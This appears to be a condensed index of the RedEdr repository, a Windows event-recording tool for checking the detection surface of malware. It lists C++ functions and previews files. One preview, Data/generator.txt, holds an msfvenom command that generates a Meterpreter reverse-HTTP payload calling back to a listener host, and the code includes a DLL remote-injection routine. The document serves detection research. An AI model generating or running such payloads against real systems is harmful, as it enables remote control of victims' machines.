  function friend (line 23136) | friend bool operator==(const_reference lhs, const_reference rhs) noexcept
  function friend (line 23168) | friend bool operator!=(const_reference lhs, const_reference rhs) noexcept
  function friend (line 23225) | friend bool operator<=(const_reference lhs, const_reference rhs) noexcept
  function friend (line 23254) | friend bool operator>(const_reference lhs, const_reference rhs) noexcept
  function friend (line 23284) | friend bool operator>=(const_reference lhs, const_reference rhs) noexcept
  function friend (line 23325) | friend std::ostream& operator<<(std::ostream& o, const basic_json& j)
  function JSON_HEDLEY_WARN_UNUSED_RESULT (line 23364) | JSON_HEDLEY_WARN_UNUSED_RESULT
  function JSON_HEDLEY_WARN_UNUSED_RESULT (line 23378) | JSON_HEDLEY_WARN_UNUSED_RESULT
  function basic_json (line 23392) | static basic_json parse(detail::span_input_adapter&& i,
  function accept (line 23405) | static bool accept(InputType&& i,
  function accept (line 23414) | static bool accept(IteratorType first, IteratorType last,
  function accept (line 23422) | static bool accept(detail::span_input_adapter&& i,
  function sax_parse (line 23432) | static bool sax_parse(InputType&& i, SAX* sax,
  function sax_parse (line 23447) | static bool sax_parse(IteratorType first, IteratorType last, SAX* sax,
  function sax_parse (line 23466) | static bool sax_parse(detail::span_input_adapter&& i, SAX* sax,
  function JSON_HEDLEY_RETURNS_NON_NULL (line 23507) | JSON_HEDLEY_RETURNS_NON_NULL
  type data (line 23539) | struct data
    method data (line 23547) | data(const value_t v)
    method data (line 23552) | data(size_type cnt, const basic_json& val)
    method data (line 23558) | data() noexcept = default;
    method data (line 23559) | data(data&&) noexcept = default;
    method data (line 23560) | data(const data&) noexcept = delete;
    method data (line 23561) | data& operator=(data&&) noexcept = delete;
    method data (line 23562) | data& operator=(const data&) noexcept = delete;
  function to_cbor (line 23596) | static void to_cbor(const basic_json& j, detail::output_adapter<std::uin...
  function to_cbor (line 23603) | static void to_cbor(const basic_json& j, detail::output_adapter<char> o)
  function to_msgpack (line 23610) | static std::vector<std::uint8_t> to_msgpack(const basic_json& j)
  function to_msgpack (line 23619) | static void to_msgpack(const basic_json& j, detail::output_adapter<std::...
  function to_msgpack (line 23626) | static void to_msgpack(const basic_json& j, detail::output_adapter<char> o)
  function to_ubjson (line 23633) | static std::vector<std::uint8_t> to_ubjson(const basic_json& j,
  function to_ubjson (line 23644) | static void to_ubjson(const basic_json& j, detail::output_adapter<std::u...
  function to_ubjson (line 23652) | static void to_ubjson(const basic_json& j, detail::output_adapter<char> o,
  function to_bjdata (line 23660) | static std::vector<std::uint8_t> to_bjdata(const basic_json& j,
  function to_bjdata (line 23671) | static void to_bjdata(const basic_json& j, detail::output_adapter<std::u...
  function to_bjdata (line 23679) | static void to_bjdata(const basic_json& j, detail::output_adapter<char> o,
  function to_bson (line 23687) | static std::vector<std::uint8_t> to_bson(const basic_json& j)
  function to_bson (line 23696) | static void to_bson(const basic_json& j, detail::output_adapter<std::uin...
  function to_bson (line 23703) | static void to_bson(const basic_json& j, detail::output_adapter<char> o)
  function JSON_HEDLEY_WARN_UNUSED_RESULT (line 23711) | JSON_HEDLEY_WARN_UNUSED_RESULT
  function JSON_HEDLEY_WARN_UNUSED_RESULT (line 23727) | JSON_HEDLEY_WARN_UNUSED_RESULT
  function basic_json (line 23743) | static basic_json from_cbor(const T* ptr, std::size_t len,
  function basic_json (line 23753) | static basic_json from_cbor(detail::span_input_adapter&& i,
  function JSON_HEDLEY_WARN_UNUSED_RESULT (line 23769) | JSON_HEDLEY_WARN_UNUSED_RESULT
  function JSON_HEDLEY_WARN_UNUSED_RESULT (line 23784) | JSON_HEDLEY_WARN_UNUSED_RESULT
  function basic_json (line 23799) | static basic_json from_msgpack(const T* ptr, std::size_t len,
  function basic_json (line 23808) | static basic_json from_msgpack(detail::span_input_adapter&& i,
  function JSON_HEDLEY_WARN_UNUSED_RESULT (line 23823) | JSON_HEDLEY_WARN_UNUSED_RESULT
  function JSON_HEDLEY_WARN_UNUSED_RESULT (line 23838) | JSON_HEDLEY_WARN_UNUSED_RESULT
  function basic_json (line 23853) | static basic_json from_ubjson(const T* ptr, std::size_t len,
  function basic_json (line 23862) | static basic_json from_ubjson(detail::span_input_adapter&& i,
  function JSON_HEDLEY_WARN_UNUSED_RESULT (line 23877) | JSON_HEDLEY_WARN_UNUSED_RESULT
  function JSON_HEDLEY_WARN_UNUSED_RESULT (line 23892) | JSON_HEDLEY_WARN_UNUSED_RESULT
  function JSON_HEDLEY_WARN_UNUSED_RESULT (line 23907) | JSON_HEDLEY_WARN_UNUSED_RESULT
  function JSON_HEDLEY_WARN_UNUSED_RESULT (line 23922) | JSON_HEDLEY_WARN_UNUSED_RESULT
  function basic_json (line 23937) | static basic_json from_bson(const T* ptr, std::size_t len,
  function basic_json (line 23946) | static basic_json from_bson(detail::span_input_adapter&& i,
  function reference (line 23968) | reference operator[](const json_pointer& ptr)
  function reference (line 23975) | reference operator[](const ::nlohmann::json_pointer<BasicJsonType>& ptr)
  function const_reference (line 23982) | const_reference operator[](const json_pointer& ptr) const
  function const_reference (line 23989) | const_reference operator[](const ::nlohmann::json_pointer<BasicJsonType>...
  function reference (line 23996) | reference at(const json_pointer& ptr)
  function reference (line 24003) | reference at(const ::nlohmann::json_pointer<BasicJsonType>& ptr)
  function const_reference (line 24010) | const_reference at(const json_pointer& ptr) const
  function const_reference (line 24017) | const_reference at(const ::nlohmann::json_pointer<BasicJsonType>& ptr) c...
  function basic_json (line 24024) | basic_json flatten() const
  function basic_json (line 24033) | basic_json unflatten() const
  function patch_inplace (line 24049) | void patch_inplace(const basic_json& json_patch)
  function basic_json (line 24320) | basic_json patch(const basic_json& json_patch) const
  function JSON_HEDLEY_WARN_UNUSED_RESULT (line 24329) | JSON_HEDLEY_WARN_UNUSED_RESULT
  function merge_patch (line 24472) | void merge_patch(const basic_json& apply_patch)
  function NLOHMANN_BASIC_JSON_TPL_DECLARATION (line 24503) | NLOHMANN_BASIC_JSON_TPL_DECLARATION
  function NLOHMANN_JSON_NAMESPACE_END (line 24540) | NLOHMANN_JSON_NAMESPACE_END

FILE: RedEdrShared/loguru.cpp
  type FileAbs (line 147) | struct FileAbs
    type stat (line 152) | struct stat
  type Callback (line 161) | struct Callback
  function terminal_has_color (line 257) | bool terminal_has_color() { return s_terminal_has_color; }
  function FILE (line 289) | inline FILE* to_file(void* user_data) { return reinterpret_cast<FileAbs*...
  function FILE (line 291) | inline FILE* to_file(void* user_data) { return reinterpret_cast<FILE*>(u...
  function file_log (line 294) | void file_log(void* user_data, const Message& message)
  function file_close (line 323) | void file_close(void* user_data)
  function file_flush (line 334) | void file_flush(void* user_data)
  function file_reopen (line 341) | void file_reopen(void* user_data)
  function syslog_log (line 379) | void syslog_log(void* /*user_data*/, const Message& message)
  function syslog_close (line 407) | void syslog_close(void* /*user_data*/)
  function syslog_flush (line 412) | void syslog_flush(void* /*user_data*/)
  function Text (line 421) | Text vtextprintf(const char* format, fmt::format_args args)
  function Text (line 427) | static Text vtextprintf(const char* format, va_list vlist)
  function Text (line 443) | Text textprintf(const char* format, ...)
  function Text (line 454) | Text textprintf()
  function parse_args (line 473) | static void parse_args(int& argc, char* argv[], const char* verbosity_flag)
  function now_ns (line 526) | static long long now_ns()
  function on_atexit (line 544) | static void on_atexit()
  function write_hex_digit (line 552) | static void write_hex_digit(std::string& out, unsigned num)
  function write_hex_byte (line 559) | static void write_hex_byte(std::string& out, uint8_t n)
  function escape (line 565) | static void escape(std::string& out, const std::string& str)
  function Text (line 588) | Text errno_as_text()
  function init (line 607) | void init(int& argc, char* argv[], const Options& options)
  function shutdown (line 682) | void shutdown()
  function write_date_time (line 691) | void write_date_time(char* buff, unsigned long long buff_size)
  function suggest_log_path (line 737) | void suggest_log_path(const char* prefix, char* buff, unsigned long long...
  function add_file (line 799) | bool add_file(const char* path_in, FileMode mode, Verbosity verbosity)
  type loguru (line 1931) | namespace loguru {
    function install_signal_handlers (line 1932) | void install_signal_handlers(const SignalOptions& signal_options)
    function write_to_stderr (line 1943) | void write_to_stderr(const char* data, size_t size)
    function write_to_stderr (line 1949) | void write_to_stderr(const char* data)
    function call_default_signal_handler (line 1954) | void call_default_signal_handler(int signal_number)
    function signal_handler (line 1964) | void signal_handler(int signal_number, siginfo_t*, void*)
    function install_signal_handlers (line 2024) | void install_signal_handlers(const SignalOptions& signal_options)
  type loguru (line 1941) | namespace loguru
    function install_signal_handlers (line 1932) | void install_signal_handlers(const SignalOptions& signal_options)
    function write_to_stderr (line 1943) | void write_to_stderr(const char* data, size_t size)
    function write_to_stderr (line 1949) | void write_to_stderr(const char* data)
    function call_default_signal_handler (line 1954) | void call_default_signal_handler(int signal_number)
    function signal_handler (line 1964) | void signal_handler(int signal_number, siginfo_t*, void*)
    function install_signal_handlers (line 2024) | void install_signal_handlers(const SignalOptions& signal_options)

FILE: RedEdrShared/loguru.hpp
  function LOGURU_ANONYMOUS_NAMESPACE_BEGIN (line 266) | LOGURU_ANONYMOUS_NAMESPACE_BEGIN
  function LOGURU_ANONYMOUS_NAMESPACE_BEGIN (line 1225) | LOGURU_ANONYMOUS_NAMESPACE_BEGIN

FILE: RedEdrShared/mypeb.h
  type API_SET_NAMESPACE (line 13) | typedef struct _API_SET_NAMESPACE
  type API_SET_HASH_ENTRY (line 25) | typedef struct _API_SET_HASH_ENTRY
  type API_SET_NAMESPACE_ENTRY (line 32) | typedef struct _API_SET_NAMESPACE_ENTRY
  type API_SET_VALUE_ENTRY (line 43) | typedef struct _API_SET_VALUE_ENTRY
  type TELEMETRY_COVERAGE_HEADER (line 53) | typedef struct _TELEMETRY_COVERAGE_HEADER
  type _RTL_BITMAP (line 75) | struct _RTL_BITMAP
  type _RTL_USER_PROCESS_PARAMETERS (line 77) | struct _RTL_USER_PROCESS_PARAMETERS
  type _RTL_CRITICAL_SECTION (line 78) | struct _RTL_CRITICAL_SECTION
  type _SILO_USER_SHARED_DATA (line 79) | struct _SILO_USER_SHARED_DATA
  type _LEAP_SECOND_DATA (line 80) | struct _LEAP_SECOND_DATA
  type ULONG (line 85) | typedef ULONG GDI_HANDLE_BUFFER[GDI_HANDLE_BUFFER_SIZE];
  type ACTIVATION_CONTEXT_DATA (line 87) | typedef struct _ACTIVATION_CONTEXT_DATA
  type ASSEMBLY_STORAGE_MAP_ENTRY (line 100) | typedef struct _ASSEMBLY_STORAGE_MAP_ENTRY
  type ASSEMBLY_STORAGE_MAP (line 107) | typedef struct _ASSEMBLY_STORAGE_MAP
  type CURDIR (line 116) | typedef struct _CURDIR
  type RTL_DRIVE_LETTER_CURDIR (line 122) | typedef struct _RTL_DRIVE_LETTER_CURDIR
  type MY_RTL_USER_PROCESS_PARAMETERS (line 132) | typedef struct _MY_RTL_USER_PROCESS_PARAMETERS
  type MYPEB (line 185) | typedef struct _MYPEB

FILE: RedEdrShared/myprocess.cpp
  function GetProcessNameByPid (line 19) | std::wstring GetProcessNameByPid(DWORD pid) {
  function Process (line 133) | Process* MakeProcess(DWORD pid, std::vector<std::string> targetNames) {
  function BOOL (line 159) | BOOL Process::OpenTarget() {
  function BOOL (line 169) | BOOL Process::CloseTarget() {
  function HANDLE (line 178) | HANDLE Process::GetHandle() {
  function BOOL (line 203) | BOOL Process::doObserve() {

FILE: RedEdrShared/myprocess.h
  function class (line 11) | class Process {

FILE: RedEdrShared/piping.cpp
  function BOOL (line 33) | BOOL PipeServer::StartAndWaitForClient(BOOL allow_all) {
  function BOOL (line 41) | BOOL PipeServer::Start(BOOL allow_all) {
  function BOOL (line 102) | BOOL PipeServer::WaitForClient() {
  function BOOL (line 126) | BOOL PipeServer::Send(char* buffer) {
  function BOOL (line 173) | BOOL PipeServer::Receive(char* buffer, size_t buffer_len) {
  function BOOL (line 276) | BOOL PipeServer::IsConnected() {
  function BOOL (line 293) | BOOL PipeClient::Connect(const wchar_t *pipe_path) {
  function BOOL (line 329) | BOOL PipeClient::Send(char* buffer) {
  function BOOL (line 376) | BOOL PipeClient::Receive(char* buffer, size_t buffer_len) {

FILE: RedEdrShared/piping.h
  function class (line 11) | class PipeServer {
  function class (line 40) | class PipeClient {

FILE: RedEdrShared/process_mem_static.cpp
  function BOOL (line 25) | BOOL MemStatic::ExistMemoryRegion(uint64_t addr) {
  function MemoryRegion (line 30) | MemoryRegion* MemStatic::GetMemoryRegion(uint64_t addr) {

FILE: RedEdrShared/process_mem_static.h
  function class (line 12) | class MemoryRegion {
  function class (line 25) | class MemStatic {

FILE: RedEdrShared/process_query.cpp
  type _MEMORY_INFORMATION_CLASS (line 34) | enum _MEMORY_INFORMATION_CLASS {
  function BOOL (line 57) | BOOL InitProcessQuery() {
  function GetProcessName (line 73) | std::wstring GetProcessName(HANDLE hProcess) {
  function ProcessPebInfoRet (line 93) | ProcessPebInfoRet ProcessPebInfo(HANDLE hProcess) {
  function ReadMemoryAsWString (line 171) | std::wstring ReadMemoryAsWString(HANDLE hProcess, LPCVOID remoteAddress,...
  function ProcessEnumerateModules (line 200) | std::vector<ProcessLoadedDll> ProcessEnumerateModules(HANDLE hProcess) {
  function GetSectionNameFromRaw (line 295) | std::string GetSectionNameFromRaw(const IMAGE_SECTION_HEADER& section) {
  function EnumerateModuleSections (line 301) | std::vector<ModuleSection> EnumerateModuleSections(HANDLE hProcess, LPVO...
  function ProcessAddrInfoRet (line 405) | ProcessAddrInfoRet ProcessAddrInfo(HANDLE hProcess, PVOID address) {
  function QueryMemoryRegions (line 441) | bool QueryMemoryRegions(HANDLE hProcess) {
  function GetRemoteUnicodeStr (line 487) | std::string GetRemoteUnicodeStr(HANDLE hProcess, UNICODE_STRING* u) {
  function wchar_t (line 522) | wchar_t* GetFileNameFromPath(wchar_t* path) {
  function DWORD (line 531) | DWORD FindProcessIdByName(const std::wstring& processName) {

FILE: RedEdrShared/process_query.h
  type ProcessAddrInfoRet (line 13) | struct ProcessAddrInfoRet {
  type ProcessPebInfoRet (line 33) | struct ProcessPebInfoRet {
  type ProcessLoadedDll (line 46) | struct ProcessLoadedDll {
  type ModuleSection (line 54) | struct ModuleSection {

FILE: RedEdrShared/process_resolver.cpp
  function BOOL (line 52) | BOOL ProcessResolver::containsObject(DWORD pid) {
  function Process (line 71) | Process* ProcessResolver::getObject(DWORD id) {
  function BOOL (line 120) | BOOL ProcessResolver::PopulateAllProcesses() {

FILE: RedEdrShared/process_resolver.h
  function class (line 12) | class ProcessResolver {

FILE: RedEdrShared/ranges.h
  function class (line 10) | class Range {
  function contains (line 16) | bool contains(uint64_t value) const {
  function overlaps (line 20) | bool overlaps(const Range& other) const {
  function Range (line 24) | Range intersect(const Range& other) const {
  function Range (line 30) | Range merge(const Range& other) const {
  function is_adjacent (line 47) | bool is_adjacent(const Range& other) const {
  function class (line 53) | class RangeSet {
  function Range (line 69) | const Range* get(uint64_t value) const {

FILE: RedEdrShared/utils.cpp
  function PrintWcharBufferAsHex (line 15) | void PrintWcharBufferAsHex(const wchar_t* buffer, size_t bufferSize) {
  function wchar_t (line 31) | wchar_t* wstring2wcharAlloc(const std::wstring& str) {
  function pointer_to_uint64 (line 39) | uint64_t pointer_to_uint64(PVOID ptr) {
  function PVOID (line 43) | PVOID uint64_to_pointer(uint64_t i) {
  function wchar2string (line 48) | std::string wchar2string(const wchar_t* wideString) {
  function get_time (line 62) | uint64_t get_time() {
  function to_lowercase (line 78) | std::wstring to_lowercase(const std::wstring& str) {
  function to_lowercase2 (line 84) | std::string to_lowercase2(const std::string& str) {
  function remove_all_occurrences_case_insensitive (line 92) | void remove_all_occurrences_case_insensitive(std::string& str, const std...
  function ReplaceAll (line 104) | std::wstring ReplaceAll(std::wstring str, const std::wstring& from, cons...
  function contains_case_insensitive (line 114) | bool contains_case_insensitive(const std::string& haystack, const std::s...
  function ends_with_case_insensitive (line 121) | bool ends_with_case_insensitive(const std::string& str, const std::strin...
  function wchar_t (line 132) | wchar_t* string2wcharAlloc(const std::string& str) {
  function wstring2string (line 148) | std::string wstring2string(std::wstring& wide_string) {
  function read_file (line 173) | std::string read_file(const std::string& path) {
  function write_file (line 185) | void write_file(std::string path, std::string data) {
  function get_time_for_file (line 196) | std::string get_time_for_file() {
  function GetSectionPermissions (line 273) | std::string GetSectionPermissions(DWORD characteristics) {
  function wchar_t (line 365) | wchar_t* GetMemoryPermissions_Unused(wchar_t* buf, DWORD protection) {
  function wchar_t (line 383) | wchar_t* JsonEscape(wchar_t* str, size_t buffer_size) {
  function DWORD (line 413) | DWORD StartProcessInBackground(LPCWSTR exePath, LPCWSTR commandLine) {
  function wchar_t (line 456) | wchar_t* char2wcharAlloc(const char* charStr) {
  function string2wstring (line 471) | std::wstring string2wstring(const std::string& str) {
  function wstring_starts_with (line 483) | bool wstring_starts_with(const std::wstring& str, const std::wstring& pr...

FILE: RedEdrTester/RedEdrTester.cpp
  function SendToKernel (line 35) | void SendToKernel(int enable, char* target) {
  function SendToKernelReader (line 41) | void SendToKernelReader(char* data) {
  function SendToDllReader (line 49) | void SendToDllReader(char* data) {
  function processinfo (line 57) | void processinfo(char* pidStr) {
  function DoStuff (line 101) | void DoStuff() {
  function AnalyzeFile (line 139) | void AnalyzeFile(char *fname) {
  function test (line 169) | void test() {
  function main (line 173) | int main(int argc, char* argv[]) {

FILE: Shared/common.h
  type MY_DRIVER_DATA (line 20) | typedef struct _MY_DRIVER_DATA {

FILE: UnitTests/UnitTestAnalyzer.cpp
  type UnitTests (line 12) | namespace UnitTests
    function TEST_CLASS (line 14) | TEST_CLASS(AnalyzerTest)

FILE: UnitTests/UnitTestEventProducer.cpp
  type UnitTests (line 13) | namespace UnitTests
    function TEST_CLASS (line 15) | TEST_CLASS(EventProducerTest)
    function TEST_METHOD (line 25) | TEST_METHOD(ConvertWstringToString2) {

FILE: UnitTests/UnitTestProcessInfo.cpp
  type UnitTests (line 21) | namespace UnitTests
    function TEST_CLASS (line 23) | TEST_CLASS(MemInfoTest)
    function TEST_METHOD (line 46) | TEST_METHOD(MemInfoMultiple)
    function TEST_METHOD (line 65) | TEST_METHOD(MemInfoUsage)
  function TEST_CLASS (line 76) | TEST_CLASS(ProcessInfoTest)
  function TEST_METHOD (line 105) | TEST_METHOD(TestProcessViaMakeProcess)
  function TEST_METHOD (line 119) | TEST_METHOD(TestProcessNonObserverValidProcessViaMakeProcess)
  function TEST_METHOD (line 132) | TEST_METHOD(TestProcessNonObserverInValidProcessViaMakeProcess)

FILE: UnitTests/UnitTestRanges.cpp
  type RangeSetTests (line 8) | namespace RangeSetTests
    function TEST_CLASS (line 10) | TEST_CLASS(RangeSetTests)
    function TEST_METHOD (line 39) | TEST_METHOD(TestContains)
    function TEST_METHOD (line 53) | TEST_METHOD(TestIntersection)

FILE: UnitTests/UnitTests.cpp
  type UnitTests (line 7) | namespace UnitTests
    function TEST_CLASS (line 9) | TEST_CLASS(UnitTests)
    function TEST_METHOD (line 19) | TEST_METHOD(TestTranslate)

FILE: UnitTests/logging.cpp
  function LOG_A (line 13) | void LOG_A(int verbosity, const char* format, ...)
  function LOG_W (line 29) | void LOG_W(int verbosity, const wchar_t* format, ...)

FILE: elam_driver/elam_driver.c
  function NTSTATUS (line 11) | NTSTATUS

Download .json

Condensed preview — 146 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (2,557K chars).

[
  {
    "path": ".gitattributes",
    "chars": 2518,
    "preview": "###############################################################################\n# Set default behavior to automatically "
  },
  {
    "path": ".gitignore",
    "chars": 6252,
    "preview": "## Ignore Visual Studio temporary files, build results, and\n## files generated by popular Visual Studio add-ons.\n##\n## G"
  },
  {
    "path": "CLAUDE.md",
    "chars": 1026,
    "preview": "# RedEdr\n\nRedEdr will record the events generated by a process. Either its ETW (-TI) events, \nor use ntdll hooking to re"
  },
  {
    "path": "Data/dostuff.events.json",
    "chars": 111084,
    "preview": "[{\"callback\":\"process_create\",\"id\":0,\"krn_pid\":8500,\"name\":\"\\\\Device\\\\HarddiskVolume2\\\\Users\\\\hacker\\\\source\\\\repos\\\\Red"
  },
  {
    "path": "Data/generator.txt",
    "chars": 609,
    "preview": "# non-staged\nmsfvenom -a x64 -p windows/x64/meterpreter_reverse_http AUTOLOADSTDAPI=FALSE LPORT=8080 LHOST=10.10.10.107 "
  },
  {
    "path": "Doc/api.md",
    "chars": 3840,
    "preview": "# RedEdr HTTP API Documentation\n\nThis document is AI generated but reviewed.\n\nRedEdr provides a REST API through an embe"
  },
  {
    "path": "Doc/notes.md",
    "chars": 1046,
    "preview": "# Notes\n\n## Solutions\n\nRedEdr: \n* ETW reader\n* MPLOG reader\n* pipe-server for RedEdrDll (`pipe\\\\RedEdrDllCom`)\n* pipe-se"
  },
  {
    "path": "LICENSE.txt",
    "chars": 35149,
    "preview": "                    GNU GENERAL PUBLIC LICENSE\n                       Version 3, 29 June 2007\n\n Copyright (C) 2007 Free "
  },
  {
    "path": "README.md",
    "chars": 13798,
    "preview": "# RedEdr\n\nDisplay events from Windows to see the detection surface of your malware. Same data as an ETW-based EDR sees "
  },
  {
    "path": "RedEdr/RedEdr.cpp",
    "chars": 7956,
    "preview": "\n#include <windows.h>\n#include <iostream>\n#include <vector>\n\n#include \"logging.h\"\n#include \"manager.h\"\n#include \"cxxops."
  },
  {
    "path": "RedEdr/RedEdr.vcxproj",
    "chars": 11310,
    "preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/msb"
  },
  {
    "path": "RedEdr/RedEdr.vcxproj.filters",
    "chars": 7253,
    "preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuil"
  },
  {
    "path": "RedEdr/config.cpp",
    "chars": 39,
    "preview": "\n#include \"config.h\"\n\nConfig g_Config;\n"
  },
  {
    "path": "RedEdr/config.h",
    "chars": 1058,
    "preview": "#pragma once\n#include <windows.h>\n#include <vector>\n#include <string>\n\n\nclass Config {\npublic:\n\tstd::vector<std::string>"
  },
  {
    "path": "RedEdr/cxxops.hpp",
    "chars": 81109,
    "preview": "/*\n\nCopyright (c) 2014-2022 Jarryd Beck\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof"
  },
  {
    "path": "RedEdr/design.css",
    "chars": 1274,
    "preview": "\nbody {\n    font-family: \"Courier New\", Courier, monospace;\n    margin: 0;\n    padding: 0;\n}\nheader {\n    background-col"
  },
  {
    "path": "RedEdr/dllinjector.cpp",
    "chars": 3675,
    "preview": "#include <windows.h>\n\n#include \"dllinjector.h\"\n#include \"logging.h\"\n#include \"config.h\"\n\n\n// File mostly from MyDumbEdr\n"
  },
  {
    "path": "RedEdr/dllinjector.h",
    "chars": 121,
    "preview": "#pragma once\n\n#include <windows.h>\n\n#define MESSAGE_SIZE 1024\n#define MAX_PATH 260\n\nBOOL remote_inject(DWORD target_pid)"
  },
  {
    "path": "RedEdr/dllreader.cpp",
    "chars": 6376,
    "preview": "#include <windows.h>\n#include <iostream>\n#include <vector>\n#include <string>\n#include <cstdio>\n#include <thread>\n#includ"
  },
  {
    "path": "RedEdr/dllreader.h",
    "chars": 131,
    "preview": "#pragma once\n\n#include <windows.h>\n#include <vector>\n\n\nbool DllReaderInit(std::vector<HANDLE>& threads);\nvoid DllReaderS"
  },
  {
    "path": "RedEdr/etwreader.cpp",
    "chars": 19523,
    "preview": "#include <Windows.h>\n#include <iostream>\n#include <vector>\n#include <atomic>\n#include <krabs.hpp>\n#include \"json.hpp\"\n\n#"
  },
  {
    "path": "RedEdr/etwreader.h",
    "chars": 356,
    "preview": "#pragma once\n\n#include <windows.h>\n#include <evntrace.h>\n#include <vector>\n\n\ntypedef void (WINAPI* EventRecordCallbackFu"
  },
  {
    "path": "RedEdr/event_aggregator.cpp",
    "chars": 1982,
    "preview": "#include <iostream>\n#include <sstream>\n#include <vector>\n\n#include \"event_aggregator.h\"\n#include \"logging.h\"\n#include \"u"
  },
  {
    "path": "RedEdr/event_aggregator.h",
    "chars": 921,
    "preview": "#pragma once\n\n#include <windows.h>\n#include <vector>\n#include <mutex>\n#include <atomic>\n\n\nclass EventAggregator {\npublic"
  },
  {
    "path": "RedEdr/event_augmenter.cpp",
    "chars": 1625,
    "preview": "\n#include \"logging.h\"\n#include \"config.h\"\n#include \"json.hpp\"\n\n#include \"event_augmenter.h\"\n\n\n/* Augments the Event JSON"
  },
  {
    "path": "RedEdr/event_augmenter.h",
    "chars": 186,
    "preview": "#pragma once\n\n#include \"json.hpp\"\n#include \"myprocess.h\"\n\n\nvoid AugmentEvent(nlohmann::json& j, Process *process);\nvoid "
  },
  {
    "path": "RedEdr/event_processor.cpp",
    "chars": 9597,
    "preview": "#include <iostream>\n#include <sstream>\n#include <vector>\n\n#include \"process_resolver.h\"\n#include \"process_query.h\"\n#incl"
  },
  {
    "path": "RedEdr/event_processor.h",
    "chars": 947,
    "preview": "#pragma once\n\n#include <windows.h>\n#include <vector>\n#include <string>\n#include <mutex>\n\n#include \"json.hpp\"\n#include \"m"
  },
  {
    "path": "RedEdr/httplib.h",
    "chars": 331603,
    "preview": "//\n//  httplib.h\n//\n//  Copyright (c) 2024 Yuji Hirose. All rights reserved.\n//  MIT License\n//\n\n#ifndef CPPHTTPLIB_HTTP"
  },
  {
    "path": "RedEdr/index.html",
    "chars": 7413,
    "preview": "<!DOCTYPE html>\n<html lang=\"en\">\n<head>\n    <meta charset=\"UTF-8\">\n    <meta name=\"viewport\" content=\"width=device-width"
  },
  {
    "path": "RedEdr/jsonw.hpp",
    "chars": 53460,
    "preview": "//\n// jsonw.hpp - single header c++ json library\n// See README.md for detail\n//\n#ifndef OCTILLION_JSONW_HEADER\n#define O"
  },
  {
    "path": "RedEdr/kernelinterface.cpp",
    "chars": 8585,
    "preview": "#include <windows.h>\n#include <winioctl.h>\n#include \"../Shared/common.h\"\n\n#include \"logging.h\"\n#include \"config.h\"\n#incl"
  },
  {
    "path": "RedEdr/kernelinterface.h",
    "chars": 149,
    "preview": "#pragma once\n\nBOOL ConfigureKernelDriver(int enable);\nBOOL LoadKernelDriver();\nBOOL UnloadKernelDriver();\nBOOL IsService"
  },
  {
    "path": "RedEdr/kernelreader.cpp",
    "chars": 4182,
    "preview": "#include <windows.h>\n#include <iostream>\n#include <vector>\n#include <string>\n\n#include \"../Shared/common.h\"\n#include \"lo"
  },
  {
    "path": "RedEdr/kernelreader.h",
    "chars": 115,
    "preview": "#pragma once\n\n#include <vector>\n\nbool KernelReaderInit(std::vector<HANDLE>& threads);\nvoid KernelReaderShutdown();\n"
  },
  {
    "path": "RedEdr/logging.cpp",
    "chars": 4532,
    "preview": "#include <iostream>\n#include <windows.h>\n#include <vector>\n#include <string>\n#include <mutex>\n\n#include <chrono>\n#includ"
  },
  {
    "path": "RedEdr/logging.h",
    "chars": 232,
    "preview": "#pragma once\n\n#include <vector>\n#include <string>\n\n#include \"../Shared/common.h\"\nvoid LOG_W(int verbosity, const wchar_t"
  },
  {
    "path": "RedEdr/logreader.cpp",
    "chars": 4500,
    "preview": "#include <windows.h>\n#include <vector>\n#include <string>\n\n#include \"logging.h\"\n#include \"logreader.h\"\n#include \"utils.h\""
  },
  {
    "path": "RedEdr/logreader.h",
    "chars": 278,
    "preview": "#pragma once\n\n#include <windows.h>\n#include <vector>\n#include <string>\n\n\nstd::wstring findFiles(const std::wstring& dire"
  },
  {
    "path": "RedEdr/manager.cpp",
    "chars": 7537,
    "preview": "#include <windows.h>\n#include <iostream>\n#include <string>\n\n#include \"config.h\"\n#include \"etwreader.h\"\n#include \"kernelr"
  },
  {
    "path": "RedEdr/manager.h",
    "chars": 210,
    "preview": "#pragma once\n\n#include <windows.h>\n#include <vector>\n#include <string>\n\nvoid ManagerShutdown();\nBOOL ManagerStart(std::v"
  },
  {
    "path": "RedEdr/packages.config",
    "chars": 155,
    "preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<packages>\n  <package id=\"Microsoft.O365.Security.Krabsetw\" version=\"4.4.3\" targ"
  },
  {
    "path": "RedEdr/pplmanager.cpp",
    "chars": 11832,
    "preview": "#include <stdio.h>\n#include <Windows.h>\n\n#include \"logging.h\"\n#include \"../Shared/common.h\"\n#include \"serviceutils.h\"\n#i"
  },
  {
    "path": "RedEdr/pplmanager.h",
    "chars": 359,
    "preview": "#pragma once\n\n#include <Windows.h>\n#include <string>\n#include <vector>\n\nBOOL ConnectPplService();\nBOOL InstallElamCertPp"
  },
  {
    "path": "RedEdr/pplreader.cpp",
    "chars": 5062,
    "preview": "\n#include <windows.h>\n#include <iostream>\n#include <vector>\n#include <string>\n\n#include \"../Shared/common.h\"\n#include \"l"
  },
  {
    "path": "RedEdr/pplreader.h",
    "chars": 212,
    "preview": "#pragma once\n\n#include <windows.h>\n#include <vector>\n\n// PplReader: Consumes events from PPL service (ETW-TI data)\n\n// P"
  },
  {
    "path": "RedEdr/privileges.cpp",
    "chars": 8393,
    "preview": "#include <iostream>\n#include <tchar.h>\n#include <windows.h>\n#include <wtsapi32.h>\n#include <sddl.h>\n\n#include \"logging.h"
  },
  {
    "path": "RedEdr/privileges.h",
    "chars": 293,
    "preview": "#pragma once\n#include <windows.h>\n\nbool GetUserTokenForExecution(HANDLE& hTokenDup);\nbool EnablePrivilege(HANDLE hToken,"
  },
  {
    "path": "RedEdr/serviceutils.cpp",
    "chars": 1576,
    "preview": "#include <windows.h>\n#include <iostream>\n\n#include \"serviceutils.h\"\n#include \"logging.h\"\n\nBOOL DoesServiceExist(LPCWSTR "
  },
  {
    "path": "RedEdr/serviceutils.h",
    "chars": 101,
    "preview": "#pragma once\n\nBOOL IsServiceRunning(LPCWSTR driverName);\nBOOL DoesServiceExist(LPCWSTR serviceName);\n"
  },
  {
    "path": "RedEdr/shared.js",
    "chars": 3534,
